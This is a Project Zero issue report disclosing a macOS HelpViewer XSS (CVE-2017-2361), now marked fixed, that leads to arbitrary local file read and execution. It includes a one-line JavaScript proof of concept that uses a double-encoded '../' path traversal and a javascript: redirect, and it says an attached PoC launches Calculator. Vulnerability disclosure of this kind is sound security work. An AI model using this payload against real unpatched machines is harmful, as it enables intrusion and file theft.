Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Issue 1040 macOS: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
Starred by 3 users Project Member Reported by lokihardt@google.com, Dec 14 Back to list
Status: Fixed
Owner:
Closed: Feb 2
Cc:



Sign in to add a comment
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help

or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html

HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.

HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".

PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";

The attached poc will pop up a Calculator.

Tested on macOS Sierra 10.12.1 (16B2659).


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
poc.html
1.9 KB View Download
Project Member Comment 1 by lokihardt@google.com, Jan 20
Labels: CVE-2017-2361
Project Member Comment 2 by lokihardt@google.com, Feb 2
Status: Fixed
Project Member Comment 3 by lokihardt@google.com, Feb 22
Labels: -Restrict-View-Commit
Sign in to add a comment